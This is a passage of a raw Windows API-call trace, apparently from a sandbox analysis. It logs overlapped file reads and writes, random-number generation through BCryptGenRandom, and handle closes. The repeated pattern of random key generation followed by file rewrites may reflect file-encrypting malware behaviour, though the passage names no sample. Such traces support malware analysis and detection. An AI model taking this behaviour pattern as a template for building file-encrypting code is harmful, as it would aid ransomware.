GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0159.306] WriteFile (in: hFile=0x3cc, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x4ed0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0159.306] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0159.372] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10bdc, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0159.388] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0159.416] CloseHandle (hObject=0x170) returned 1 [0159.416] free (_Block=0x3df0008) [0159.416] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0159.427] CloseHandle (hObject=0x3cc) returned 1 [0159.427] free (_Block=0x1ff1e60) [0159.427] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0159.435] CloseHandle (hObject=0x338) returned 1 [0159.436] free (_Block=0x3f70048) [0159.436] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0159.449] CloseHandle (hObject=0x2a8) returned 1 [0159.449] free (_Block=0x3e70008) [0159.449] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0159.453] CloseHandle (hObject=0x308) returned 1 [0159.453] free (_Block=0x3d70450) [0159.453] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0159.455] CloseHandle (hObject=0x2a4) returned 1 [0159.455] free (_Block=0x3ef0008) [0159.455] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0159.464] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.464] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.464] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0159.464] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.465] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.465] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0159.465] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0159.465] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0159.465] free (_Block=0x3e305b8) [0159.465] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0159.465] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0159.466] free (_Block=0x1fa91d0) [0159.466] free (_Block=0x1fa2ed8) [0159.466] free (_Block=0x1fa90b8) [0159.466] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61b, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0159.466] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0159.483] CloseHandle (hObject=0x3cc) returned 1 [0159.483] free (_Block=0x3df0008) [0159.483] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0159.486] ReadFile (in: hFile=0x2a4, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x1653a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0159.488] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.195] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x15b94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0161.197] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.210] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x190e9, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0161.212] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.227] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x17b79, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0161.228] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.257] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x14033, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0161.259] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.274] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xd8f6, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0161.276] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.289] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x11780, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0161.290] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.291] CloseHandle (hObject=0x2a4) returned 1 [0161.291] free (_Block=0x3df0008) [0161.291] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.300] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.301] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.301] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0161.301] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.301] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.301] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0161.302] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0161.302] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0161.302] free (_Block=0x3e305b8) [0161.302] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0161.302] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0161.302] free (_Block=0x1fa91d0) [0161.302] free (_Block=0x1fa2ed8) [0161.302] free (_Block=0x1fa90b8) [0161.302] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0161.303] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.304] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x7880, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0161.305] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.305] CloseHandle (hObject=0x2a4) returned 1 [0161.305] free (_Block=0x3df0008) [0161.305] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.314] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.315] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.315] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0161.315] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.315] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.315] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0161.315] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0161.316] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0161.316] free (_Block=0x3e305b8) [0161.316] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0161.316] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0161.316] free (_Block=0x1fa91d0) [0161.316] free (_Block=0x1fa2ed8) [0161.316] free (_Block=0x1fa90b8) [0161.316] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0161.316] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.318] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xa920, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0161.318] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.319] CloseHandle (hObject=0x2a4) returned 1 [0161.319] free (_Block=0x3df0008) [0161.319] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.328] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.329] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.329] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0161.329] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.329] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.329] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0161.330] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0161.330] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0161.330] free (_Block=0x3e305b8) [0161.330] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0161.330] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0161.330] free (_Block=0x1fa91d0) [0161.330] free (_Block=0x1fa2ed8) [0161.330] free (_Block=0x1fa90b8) [0161.330] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61d, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0161.331] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.332] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x3b50, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0161.332] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.343] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x396a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0161.344] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.344] CloseHandle (hObject=0x2a4) returned 1 [0161.344] free (_Block=0x3df0008) [0161.344] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.354] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.354] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.354] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0161.354] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.355] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.355] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0161.355] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0161.355] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0161.355] free (_Block=0x3e305b8) [0161.355] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0161.355] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0161.356] free (_Block=0x1fa91d0) [0161.356] free (_Block=0x1fa2ed8) [0161.356] free (_Block=0x1fa90b8) [0161.356] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0161.356] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.358] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x6940, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0161.358] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.359] CloseHandle (hObject=0x2a4) returned 1 [0161.359] free (_Block=0x3df0008) [0161.359] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.368] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.369] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.369] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0161.369] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.369] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.369] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0161.370] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0161.370] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0161.370] free (_Block=0x3e305b8) [0161.370] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0161.370] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0161.370] free (_Block=0x1fa91d0) [0161.370] free (_Block=0x1fa2ed8) [0161.370] free (_Block=0x1fa90b8) [0161.370] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0161.371] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.372] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xcb10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0161.373] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.374] CloseHandle (hObject=0x2a4) returned 1 [0161.374] free (_Block=0x3df0008) [0161.374] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.382] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.383] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.383] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0161.383] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.383] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.383] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0161.384] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0161.384] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0161.384] free (_Block=0x3e305b8) [0161.384] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0161.384] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0161.384] free (_Block=0x1fa91d0) [0161.384] free (_Block=0x1fa2ed8) [0161.384] free (_Block=0x1fa90b8) [0161.384] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0161.385] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.386] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x6cf0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0161.386] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.398] CloseHandle (hObject=0x2a4) returned 1 [0161.398] free (_Block=0x3df0008) [0161.399] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0161.409] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.409] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.410] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0161.410] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.410] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.410] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0161.410] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0161.410] calloc 